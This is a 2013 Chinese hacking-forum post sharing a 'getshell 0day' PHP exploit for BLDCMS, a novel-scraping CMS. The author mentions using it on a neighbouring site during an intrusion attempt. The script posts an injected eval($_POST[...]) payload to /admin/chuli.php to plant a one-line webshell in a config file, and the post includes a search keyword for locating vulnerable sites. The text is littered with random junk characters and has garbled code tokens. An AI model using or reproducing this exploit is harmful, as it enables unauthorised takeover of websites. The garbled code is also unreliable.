之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞2 j' T' c; c; c0 m0 X/ J
& X8 ]% N t" v5 f' F4 u, w
% d% |$ _$ t. ^, ?4 H话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
" y$ Y6 B- r8 x9 h ! b% f4 g9 `4 a% C5 j+ e! g+ @, S* D
既然都有人发了 我就把我之前写好的EXP放出来吧7 g) K4 s) @) A
& g: Y, i4 G' X" p6 N% R8 `# }view source print?01.php;">
5 k7 ~% W; {" j1 t: S' A# B$ x' B" E02.<!--?php, k! ]: V. l1 }8 M' }7 E3 F; s
03.echo "-------------------------------------------------------------------
$ l& N1 x. T) y0 }' Z04.
, F; M5 W1 |. u; ^4 }05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
& ~; @$ `6 L. E06. 5 a8 W7 z8 }# m0 o0 _# j0 X, H1 g, P
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun3 c4 [8 K& u+ H( d- c( L
08. $ E1 U9 N2 T0 q
09.QQ:981009941\r\n 2013.3.21\r\n ) B a$ H* K' h; {( z1 a/ N
10. ; h! T6 E q+ p2 }; L c/ J
11. 7 Y# ]1 u$ {4 _4 l3 P0 o7 d' v
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
) B7 x' y/ r0 p; A13. + p: q% ]+ E( z4 f* |- ]
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------6 l! q! L m* w7 ?; h+ `" N1 |
15.
: x9 |) O, }. ?+ S) Y16.--------------------------------------------------------------------\r\n";
! `$ `, a4 S, g" W" o( _8 |. b17.$url=$argv[1];7 |5 e9 K0 V9 d8 `* N& j
18.$dir=$argv[2];
7 ]7 ]9 c4 a# J8 Z, I b6 \* o; e+ X5 o19.$pass=$argv[3];
, Z! Z! q, i0 Z5 k20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';, z p4 J! m7 d
21.if (emptyempty($pass)||emptyempty($url))
* {! l% \% Y' E9 d w22.{exit("请输入参数");}
# h7 o0 O/ d/ _4 ^+ a; U% Q23.else/ r% c- P H8 w0 b% K% d0 P3 H
24.{5 `: f4 P1 c/ l; a5 i
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev) M/ |+ D8 G$ W& }3 i5 |- ?% J* B( y
26. * g( \$ O" s- c" j/ z3 g3 g/ t1 e. \
27.al;. l0 W8 |. ?; M9 I' } X w
28.$length = strlen($fuckdata);
, {6 B" \% f$ K; X0 {4 Z- q29.function getshell($url,$pass)
9 v" e0 z" ]% g$ v! G! x) ^30.{
0 F: m+ Z. k& S3 C& S3 U- l31.global $url,$dir,$pass,$eval,$length,$fuckdata;; v0 s. _. S5 u
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";7 u4 `# b+ P+ N0 T/ @% W, ~
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
2 t7 i- T" u: Q+ _& g; W7 ?34.$header .= "User-Agent: MSIE\r\n";, ]. f' w# v# Z
35.$header .= "Host:".$url."\r\n";7 H7 p% X6 g) `
36.$header .= "Content-Length: ".$length."\r\n";
) w% H! A* m5 r37.$header .= "Connection: Close\r\n";# q$ _6 m+ _2 U) P* w- o& O. R
38.$header .="\r\n";. L. p" \8 z; w/ u$ G2 S- ~; b8 k
39.$header .= $fuckdata."\r\n\r\n";
% `2 _8 k5 Y4 g: F8 c40.$fp = fsockopen($url, 80,$errno,$errstr,15);
( Z$ J5 ?4 y' U. t41.if (!$fp)4 {3 z0 D& L: K$ @8 F. i
42.{, P+ j+ L3 |5 ~! N" o# F L H M# x
43.exit ("利用失败:请检查指定目标是否能正常打开");- X3 d! N/ N6 g0 H
44.}
; l/ O: l' W1 s5 u2 d; M45.else{ if (!fputs($fp,$header))1 g: g: s7 \7 S7 X. R
46.{exit ("利用失败");}
' B9 r: J h0 f$ W! X47.else
7 F) v9 ~* d1 [% q# G3 Q48.{
6 x6 e2 S: K/ d8 k49.$receive = '';0 e: b. v. z$ n1 V! w3 v' z
50.while (!feof($fp)) {
/ k& m# _' z1 @# U8 P51.$receive .= @fgets($fp, 1000);% b1 k8 N9 k J9 Q& b& `1 O
52.}0 I# u: L& i4 y% M2 L; ]9 R
53.@fclose($fp);
y. \0 o0 [/ Q A54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
! w4 s' {: h" p3 H0 f" t55.
/ B; R8 U$ i% T) V s* z56.GPC是否=off)";
2 q% [2 g7 |1 `3 Y) f- h( M$ @57.}}$ v. T" c+ a6 r, i3 o
58.}
: ^. y2 a$ h, q+ N3 W8 D- g }59.}6 P# D. ]9 ^! v9 u+ Y6 R* Y
60.getshell($url,$pass);5 q6 d' F8 g1 b3 A$ }2 g7 r
61.?-->
, X( b7 s5 ]2 D: v% Z1 `' v
, y, q0 q' `% L6 |2 }+ \2 R, w% z v( P7 l6 O
! q6 s- A& C. ?& l% p/ X9 Rby 数据流
9 R7 s1 Y# J/ |5 }2 c |
发表于 2013-3-26 20:49:10
收藏
支持
反对